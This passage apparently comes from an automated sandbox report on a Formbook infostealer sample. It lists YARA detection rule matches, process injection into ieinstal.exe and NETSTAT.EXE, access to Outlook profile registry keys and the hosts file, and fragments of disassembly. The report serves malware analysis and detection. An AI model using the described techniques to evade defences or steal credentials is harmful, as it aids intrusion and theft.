          Source: 0000000F.00000002.509897320.0000000002DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.509897320.0000000002DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.351123790.0000000003830000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.351123790.0000000003830000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.256976459.00000000045AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000000.00000003.256419246.00000000045AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000004.00000002.354123960.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.354123960.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.246042887.00000000045AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000000.00000003.246162017.00000000045AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000000.00000003.250121569.00000000045AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000000.00000003.245888864.00000000045AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000000.00000003.250000220.00000000045AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000000.00000003.250220822.00000000045AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Dgsllll[1], type: DROPPEDMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/4@6/2
          Source: C:\Users\user\Desktop\Dgslimt_Signed_.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Dgsllll[1]Jump to behavior
          Source: C:\Users\user\Desktop\Dgslimt_Signed_.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\Dgslimt_Signed_.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\Dgslimt_Signed_.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Dgslimt_Signed_.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\Dgslimt_Signed_.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Dgslimt_Signed_.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Dgslimt_Signed_.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Dgslimt_Signed_.exe 'C:\Users\user\Desktop\Dgslimt_Signed_.exe'
          Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe'
          Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe'
          Source: C:\Users\user\Desktop\Dgslimt_Signed_.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEFile written: C:\Users\user\AppData\Roaming\N64OT294\N64logri.iniJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\NETSTAT.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Dgslimt_Signed_.exeStatic file information: File size 1856114 > 1048576
          Source: Binary string: netstat.pdbGCTL source: ieinstal.exe, 00000004.00000002.350880152.00000000036F0000.00000040.00000001.sdmp
          Source: Binary string: ieinstal.pdbGCTL source: NETSTAT.EXE, 0000000F.00000002.512183965.000000000376F000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000009.00000000.323236213.000000000FA80000.00000002.00000001.sdmp
          Source: Binary string: ieinstal.pdb source: NETSTAT.EXE, 0000000F.00000002.512183965.000000000376F000.00000004.00000001.sdmp
          Source: Binary string: netstat.pdb source: ieinstal.exe, 00000004.00000002.350880152.00000000036F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000004.00000002.353345900.0000000005350000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000F.00000002.510200148.000000000321F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: ieinstal.exe, NETSTAT.EXE, 0000000F.00000002.510200148.000000000321F000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000009.00000000.323236213.000000000FA80000.00000002.00000001.sdmp
          Source: Dgslimt_Signed_.exeStatic PE information: real checksum: 0xd23ba should be: 0x1ca790
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053CD0D1 push ecx; ret 4_2_053CD0E4
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_10427A53 push cs; ret 4_2_10427A5A
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042DA38 push dword ptr [2E33947Ah]; ret 4_2_1042DA36
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1041E48A push edx; retf 4_2_1041E48B
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_104135CA push FFFFFF94h; iretd 4_2_104135CC
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042D609 push cs; retf 4_2_1042D60A
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042C6C5 push eax; ret 4_2_1042C718
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042C77C push eax; ret 4_2_1042C782
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042C712 push eax; ret 4_2_1042C718
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042C71B push eax; ret 4_2_1042C782
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042D7CF push dword ptr [2E33947Ah]; ret 4_2_1042DA36
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042D798 push esp; ret 4_2_1042D79C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02DE7A53 push cs; ret 15_2_02DE7A5A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02DEDA38 push dword ptr [2E33947Ah]; ret 15_2_02DEDA36
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02DEC6C5 push eax; ret 15_2_02DEC718
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02DED609 push cs; retf 15_2_02DED60A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02DED7CF push dword ptr [<